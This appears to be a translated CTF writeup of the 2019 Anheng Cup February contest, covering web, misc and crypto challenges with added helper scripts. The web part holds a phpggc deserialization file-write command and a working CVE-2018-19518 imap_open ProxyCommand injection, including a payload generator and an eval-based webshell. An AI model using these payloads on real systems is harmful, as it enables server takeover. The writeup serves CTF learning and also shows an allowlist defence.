2019 安恒杯 (Anheng Cup) February Monthly CTF WriteUp


Author: Eumenides_62ac | Published 2019-02-25 18:16

Web

sleep cms

The homepage leaks the site's source code:

http://101.71.29.5:10000/web.zip

In /views/medicine/view.php the code calls unserialize() on user-supplied data:


composer.json lists a dependency with a known deserialization-to-RCE gadget chain.

phpggc ships a chain for exactly that version.

Next, find the path the application runs from.


Probing directories turns up:
/var/www/html/runtime

Generate the payload with:

phpggc SwiftMailer/FW3 /var/www/html/runtime/sky.php ~/Desktop/sky.php -b

SwiftMailer/FW3 is a file-write chain: the first argument is the path that will be written on the target, the second is the local file whose contents get written there, and -b base64-encodes the resulting serialized object.


The leaked source also contains the login password.

After logging in, submit the payload to the unserialize() call; the chain writes sky.php into runtime/, which gives a shell and the flag.

my_email

After registering, logging in and completing the profile, a "change background" feature appears; once the background is changed, the page's CSS reveals the image path:

body{
    background-image: url(./user/test123456789.jpg);
    background-size: 100%,100%;
    width: 100%;
    height: 100%;
}

So uploaded images are named by this rule:

$dir = './user/'.$username.'.jpg';

Now look at the parameters of the mail-sending request:


The parameters taken by PHP's mail():
bool mail(
    string $to,
    string $subject,
    string $message [,
    string $additional_headers [,
    string $additional_parameters ]]
)

Because the feature involves mailbox authorization, look at imap_open():

imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] ) : resource

The first parameter, $mailbox, is where the vulnerability lies: the server part of the mailbox string is passed to ssh, so an `-o ProxyCommand=...` option injects a command (CVE-2018-19518). The mailbox string cannot contain spaces, so the generator below separates ssh arguments with tab characters (\t).
Payload generator:

<?php
// Command to run on the target: drop a phpinfo() page into the web-accessible user/ directory
$payload = "echo '<?php phpinfo();' > /var/www/html/user/sky.php";
// base64 keeps quotes, spaces and '>' out of the mailbox string
$encoded_payload = base64_encode($payload);
// "\t" (tab) separates the ssh arguments; spaces are not accepted in the mailbox string
$server = "any -o ProxyCommand=echo\t".$encoded_payload."|base64\t-d|bash";
echo $server;

This prints (tabs written here as \t; in the real string they are literal tab characters):

any -o ProxyCommand=echo\tZWNobyAnPD9waHAgcGhwaW5mbygpOycgPiAvdmFyL3d3dy9odG1sL3VzZXIvc2t5LnBocA==|base64\t-d|bash

Submitting it, we find that the pipe character `|` is filtered (the payload below still contains `bash`, so that word itself passes).


The upload feature from earlier gets around this: bash will happily execute an uploaded file whatever its .jpg extension, so no pipe is needed. Build the file:
echo 'echo "<?php phpinfo();"> hack.php' > hack.jpg

Upload hack.jpg (by the naming rule above it is stored under ./user/, so the path used here has to match where the server put it), then trigger the RCE through imap_open, again with a tab rather than a space between bash and the filename; the trailing brace closes the {server} part of the mailbox string:

any -o ProxyCommand=bash hack.jpg}



Finally, replace phpinfo() with a webshell and use it to read the flag:
echo 'echo "<?php eval($_REQUEST[hack]);"> hack.php' > hack.jpg
any -o ProxyCommand=bash hack.jpg}
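To make the mailbox-string mechanics concrete, here is an added Python helper; it is not from the writeup (which used the PHP snippet above) but reproduces the same two payload variants: the base64+pipe form and the "bash uploaded-file" form used once the pipe is filtered. It also extracts the `{server}` part that c-client hands to ssh and shows the allowlist check a defender should apply before passing user input to imap_open(). The tab separator is required by the injection; the blocklist model (only `|` banned) and the safe-host pattern are assumptions for illustration.

```python
import base64
import re

SEP = "\t"  # tab: the mailbox string cannot contain spaces, so ssh arguments are tab-separated


def mailbox_pipe_variant(cmd: str, folder: str = "INBOX") -> str:
    """Variant 1: base64 the command and decode+run it on the target through a pipe."""
    b64 = base64.b64encode(cmd.encode()).decode()
    proxy = f"echo{SEP}{b64}|base64{SEP}-d|bash"
    return f"{{any -o ProxyCommand={proxy}}}{folder}"


def mailbox_file_variant(script_path: str, folder: str = "INBOX") -> str:
    """Variant 2, used once '|' is filtered: run an uploaded script with bash, no pipe."""
    return f"{{any -o ProxyCommand=bash{SEP}{script_path}}}{folder}"


def blocked_by_filter(mailbox: str, banned=("|",)) -> bool:
    """Model of the challenge's blocklist (assumed: only the pipe character is rejected)."""
    return any(b in mailbox for b in banned)


def server_part(mailbox: str) -> str:
    """The text between '{' and '}' is what c-client treats as the server and passes to ssh."""
    m = re.match(r"\{([^}]*)\}", mailbox)
    if m is None:
        raise ValueError("not a {server}folder mailbox string")
    return m.group(1)


# Defensive side: instead of a blocklist, only accept server specs that look like
# host[:port][/flag...] with no whitespace and no leading '-' (assumed pattern).
SAFE_SERVER = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]*(:\d{1,5})?(/[A-Za-z0-9=.\-]+)*")


def is_safe_mailbox(mailbox: str) -> bool:
    """Allowlist check to apply before calling imap_open() with user-controlled input."""
    try:
        srv = server_part(mailbox)
    except ValueError:
        return False
    return SAFE_SERVER.fullmatch(srv) is not None


if __name__ == "__main__":
    print(mailbox_pipe_variant("echo '<?php phpinfo();' > /var/www/html/user/sky.php"))
    print(mailbox_file_variant("hack.jpg"))
```

The allowlist rejects both payloads simply because they contain whitespace and `-o`, which is the point: filtering individual characters such as `|` leaves the `bash <file>` variant open, while accepting only a well-formed host specification closes the whole class.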

babycms

Misc

来玩个游戏吧 (Let's play a game)

First, decode this:

⠏⠏⠄⠁⠄⠀⠂⡑⡒⡓⠄⡒⠂⡑⠇⠆⡒⠉⠇⠁⠉⡔⠉⠁⠁⠀⠁⠇⡓⠅⠉⠂=

It is the Braille cipher; decoding it with the online tool https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen
gives:

??41402abc4b2a76b9719d911017c592

The first two characters are unknown (??), but the remaining 30 hex characters look like the tail of a 32-character MD5 digest; searching for them on Baidu recovers the full hash:

5d41402abc4b2a76b9719d911017c592

It is the MD5 of "hello". The next stage asks for two different files with the same MD5 hash, which Fastcoll generates (it produces MD5 collision pairs).
That yields the email:

Here is an email containing the flag:
Dear Professional ; Especially for you - this cutting-edge 
intelligence ! If you no longer wish to receive our 
publications simply reply with a Subject: of "REMOVE" 
and you will immediately be removed from our club . 
This mail is being sent in compliance with Senate bill 
2216 , Title 9 ; Section 306 ! THIS IS NOT MULTI-LEVEL 
MARKETING . Why work for somebody else when you can 
become rich as few as 35 weeks . Have you ever noticed 
more people than ever are surfing the web and people 
will do almost anything to avoid mailing their bills 
. Well, now is your chance to capitalize on this ! 
WE will help YOU decrease perceived waiting time by 
120% & decrease perceived waiting time by 140% . You 
can begin at absolutely no cost to you . But don't 
believe us ! Mrs Jones of Minnesota tried us and says 
"I was skeptical but it worked for me" . We assure 
you that we operate within all applicable laws . Because 
the Internet operates on "Internet time" you must act 
now ! Sign up a friend and your friend will be rich 
too . Warmest regards . Dear Cybercitizen , We know 
you are interested in receiving red-hot announcement 
! We will comply with all removal requests ! This mail 
is being sent in compliance with Senate bill 1619 ; 
Title 2 ; Section 301 . This is NOT unsolicited bulk 
mail ! Why work for somebody else when you can become 
rich within 53 MONTHS ! Have you ever noticed more 
people than ever are surfing the web and more people 
than ever are surfing the web . Well, now is your chance 
to capitalize on this . We will help you use credit 
cards on your website plus decrease perceived waiting 
time by 150% . The best thing about our system is that 
it is absolutely risk free for you ! But don't believe 
us ! Mrs Simpson of Washington tried us and says "Now 
I'm rich, Rich, RICH" . We assure you that we operate 
within all applicable laws ! We beseech you - act now 
! Sign up a friend and your friend will be rich too 
. Thank-you for your serious consideration of our offer 
! Dear Friend ; This letter was specially selected 
to be sent to you ! If you no longer wish to receive 
our publications simply reply with a Subject: of "REMOVE" 
and you will immediately be removed from our mailing 
list . This mail is being sent in compliance with Senate 
bill 2716 , Title 2 ; Section 306 ! This is a ligitimate 
business proposal . Why work for somebody else when 
you can become rich inside 33 weeks . Have you ever 
noticed more people than ever are surfing the web plus 
more people than ever are surfing the web . Well, now 
is your chance to capitalize on this ! WE will help 
YOU SELL MORE and process your orders within seconds 
. You can begin at absolutely no cost to you . But 
don't believe us ! Mrs Jones of Kentucky tried us and 
says "I was skeptical but it worked for me" ! This 
offer is 100% legal ! We implore you - act now . Sign 
up a friend and you'll get a discount of 50% . God 
Bless . 

Googling "spam email" together with "grid cipher" (栅格密码) turns up an online decoder: the text is in the format produced by the spammimic encoder, which hides a message inside fake spam. Decoding it gives the flag.
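The MD5 step above relied on a search engine to fill in the two missing hex characters. As an added example (not part of the original writeup), the script below does the same thing offline: it treats the `?` positions as wildcards, enumerates the 256 complete digests they allow (useful for a hash-lookup service), and hashes a small constructed wordlist to find the plaintext whose digest fits the 30 known characters. The wordlist is made up for the example.

```python
import hashlib
import itertools

# Digest recovered from the Braille stage; '?' marks the two unknown hex characters.
PARTIAL = "??41402abc4b2a76b9719d911017c592"

# Constructed wordlist standing in for the search engine the writeup used.
WORDLIST = ["password", "admin", "hello", "flag", "ctf", "123456"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def matches_partial(digest: str, partial: str) -> bool:
    """True when every non-'?' position of the pattern agrees with the digest."""
    return len(digest) == len(partial) and all(
        p == "?" or p == d for p, d in zip(partial, digest)
    )


def expand_partial(partial: str) -> list[str]:
    """Every full digest the wildcards allow (16 per '?'), e.g. to feed a lookup service."""
    slots = [i for i, ch in enumerate(partial) if ch == "?"]
    out = []
    for fill in itertools.product("0123456789abcdef", repeat=len(slots)):
        chars = list(partial)
        for pos, ch in zip(slots, fill):
            chars[pos] = ch
        out.append("".join(chars))
    return out


def recover(partial: str, words) -> list[tuple[str, str]]:
    """(word, digest) pairs whose MD5 fits the partial digest; the digest fills the gap."""
    hits = []
    for w in words:
        d = md5_hex(w.encode())
        if matches_partial(d, partial):
            hits.append((w, d))
    return hits


if __name__ == "__main__":
    print(len(expand_partial(PARTIAL)), "candidate digests")
    print(recover(PARTIAL, WORDLIST))
```

Thirty known hex characters (120 bits) leave no realistic chance of a false match, so a single wordlist hit both identifies the plaintext and completes the digest.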

flow

A traffic-analysis challenge.
Analysis turns up a file abc.html; exporting it shows:

md5 0x99a98e067af6b09e64f3740767096c96 
DES 0xb19b21e80c685bcb052988c11b987802d2f2808b2c2d8a0d (129->143) 
DES 0x684a0857b767672d52e161aa70f6bdd07c0264876559cb8b (143->129)

The 16-byte "md5" key is an HMAC-MD5 authentication key and the two 24-byte "DES" keys are 3DES encryption keys, one per direction (129->143 and 143->129 presumably denote the last octets of the two hosts). The protocol hierarchy shows IPSec Encapsulating Security Payload (ESP) traffic.



Load the keys into Wireshark: Edit > Preferences > Protocols > ESP, enable "Attempt to detect/decode encrypted ESP payloads", and add one SA per direction with its SPI, the 3DES-CBC encryption key and the HMAC-MD5-96 authentication key.

Looking at the HTTP traffic again, many more streams now appear.

They contain 38 ASCII codes; converting them to characters and concatenating gives the flag:
a = [102,108,97,103,123,50,55,98,48,51,98,55,53,56,102,50,53,53,50,55,54,101,53,97,57,56,100,97,48,101,49,57,52,55,98,101,100,125]
res = ''.join(chr(i) for i in a)  # each decimal value is one character of the flag
print(res)
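Before Wireshark can decrypt the ESP streams, the key material has to be matched to the right SA. The added example below (not from the writeup) parses the ESP header, recomputes the HMAC-MD5-96 integrity check value with the "md5" key from abc.html, and uses a successful check plus the SPI to label a packet's direction. The packet is constructed here with stand-in bytes for the 3DES-encrypted body, and the SPI values in the SA table are made up; decrypting the body would additionally need a 3DES-CBC implementation (for example pycryptodome) and the IV at the start of the payload, which is not shown.

```python
import hashlib
import hmac
import struct

AUTH_KEY = bytes.fromhex("99a98e067af6b09e64f3740767096c96")  # "md5" key from abc.html
ICV_LEN = 12  # HMAC-MD5-96: 16-byte MAC truncated to 96 bits (RFC 2403)
HDR = struct.Struct("!II")  # ESP header: 32-bit SPI, 32-bit sequence number

# Assumed security associations: SPIs are made up, labels follow the page's notation.
SA_TABLE = {0x11111111: "129->143", 0x22222222: "143->129"}


def esp_icv(key: bytes, authenticated: bytes) -> bytes:
    """ICV over SPI || seq || encrypted payload (everything that precedes the ICV)."""
    return hmac.new(key, authenticated, hashlib.md5).digest()[:ICV_LEN]


def build_esp(spi: int, seq: int, ciphertext: bytes, key: bytes) -> bytes:
    """Assemble an ESP packet: header, encrypted body (incl. padding/trailer), ICV."""
    body = HDR.pack(spi, seq) + ciphertext
    return body + esp_icv(key, body)


def parse_esp(pkt: bytes) -> dict:
    """Split a packet into its ESP fields; reject anything too short to be valid."""
    if len(pkt) < HDR.size + ICV_LEN:
        raise ValueError("too short for an ESP header plus ICV")
    spi, seq = HDR.unpack_from(pkt)
    return {"spi": spi, "seq": seq, "ciphertext": pkt[HDR.size:-ICV_LEN], "icv": pkt[-ICV_LEN:]}


def verify_esp(pkt: bytes, key: bytes) -> bool:
    """Recompute the ICV with a candidate auth key and compare in constant time."""
    if len(pkt) < HDR.size + ICV_LEN:
        return False
    return hmac.compare_digest(esp_icv(key, pkt[:-ICV_LEN]), pkt[-ICV_LEN:])


def classify(pkt: bytes, key: bytes = AUTH_KEY):
    """Direction of the SA a packet belongs to, or None if the ICV or the SPI does not match."""
    if not verify_esp(pkt, key):
        return None
    return SA_TABLE.get(parse_esp(pkt)["spi"])


if __name__ == "__main__":
    # Constructed packet: the body stands in for the 3DES-encrypted payload.
    pkt = build_esp(0x11111111, 1, bytes(range(24)), AUTH_KEY)
    print(hex(parse_esp(pkt)["spi"]), classify(pkt))
```

A failed ICV check on a real capture usually means the wrong key, wrong algorithm (HMAC-SHA1-96 instead of HMAC-MD5-96, for instance) or a swapped direction, which is the same mistake that makes Wireshark show the payload as still encrypted.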

Crypto

hahaha

An encrypted archive.
Attack it through the CRC32: ZIP stores each member's CRC32 in the clear even when the data is encrypted, and for very short members the content can be reversed from the checksum alone:

$ python crc32.py reverse 0x19BA5849

This gives the password: tanny_is_very_beautifu1_
(one CRC reverses to only a few bytes, so a 24-character password presumably came from several small members reversed one by one and joined.)
Decrypting the archive gives flag.pdf
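As an added example (not the page's crc32.py, but the same inversion it performs in "reverse" mode), the script below implements CRC-32 and the direct inverse for 4-byte content: the top byte of each CRC table entry is unique, so walking backwards from the checksum pins down the table index used at every step, after which a forward pass from the known initial state recovers the bytes. Members of 1-3 bytes have no direct inverse of that shape, so for those the script enumerates an alphabet instead; the alphabet is an assumption and the test strings are constructed.

```python
import itertools
import string

POLY = 0xEDB88320  # reflected CRC-32 polynomial used by ZIP
ALNUM = (string.ascii_letters + string.digits).encode()


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Each table entry has a distinct top byte; this is what makes the 4-byte reversal unique.
TOP_TO_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(TOP_TO_INDEX) == 256


def crc32(data: bytes) -> int:
    c = 0xFFFFFFFF
    for b in data:
        c = TABLE[(c ^ b) & 0xFF] ^ (c >> 8)
    return c ^ 0xFFFFFFFF


def reverse_crc32_4(target: int) -> bytes:
    """Recover the unique 4-byte message whose CRC-32 equals `target`."""
    # Backward pass: the top byte of each state equals the top byte of the table
    # entry used in that step, which fixes the index and the top 24 bits of the
    # previous state (its low byte is filled in by the forward pass).
    c = target ^ 0xFFFFFFFF
    indices = []
    for _ in range(4):
        i = TOP_TO_INDEX[c >> 24]
        indices.append(i)
        c = ((c ^ TABLE[i]) << 8) & 0xFFFFFFFF
    indices.reverse()
    # Forward pass from the known initial state: byte = (state ^ index) & 0xFF.
    c = 0xFFFFFFFF
    out = bytearray()
    for i in indices:
        out.append((c ^ i) & 0xFF)
        c = TABLE[i] ^ (c >> 8)
    assert c ^ 0xFFFFFFFF == target
    return bytes(out)


def brute_force_short(target: int, length: int, alphabet: bytes = ALNUM) -> list:
    """For 1-3 byte members enumerate an alphabet; preimages of a fixed short length are unique."""
    return [bytes(cand) for cand in itertools.product(alphabet, repeat=length)
            if crc32(bytes(cand)) == target]


if __name__ == "__main__":
    print(hex(crc32(b"tann")), reverse_crc32_4(crc32(b"tann")))
```

The reversal only works because the CRC is a linear function of the data: a 32-bit checksum of 32 bits of input is a bijection. For members longer than 4 bytes the preimage is no longer unique and tools fall back to enumerating candidates over a character set, which is why this trick is practical mainly for tiny archive members like the ones here.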


The task is to find the string whose SHA1 is e6079c5ce56e781a50f4bf853cdb5302e0d8f054.
The character pool is given as these groups:
1!
2@
{[
}]
asefcghnl

Because the answer has the form flag{...}, the characters consumed by "flag{" and "}" (f, l, a, g, {, }) are removed from the pool, leaving:

1!
2@
sechn

Use the following script (one character from "1!", one from "2@", plus all of "sechn", in every order):

import itertools
import hashlib

TARGET = 'e6079c5ce56e781a50f4bf853cdb5302e0d8f054'

def sha1(s):
    return hashlib.sha1(s.encode()).hexdigest()

a1 = '1!'      # exactly one of these
a2 = '2@'      # exactly one of these
rest = 'sechn'  # the remaining letters, each used once
for c1 in a1:
    for c2 in a2:
        for perm in itertools.permutations(c1 + c2 + rest):
            res = 'flag{' + ''.join(perm) + '}'
            if sha1(res) == TARGET:
                print(res)
                raise SystemExit  # stop all loops on the first hit

which prints the flag.

Original post: https://www.haomeiwen.com/subject/yhmvyqtx.html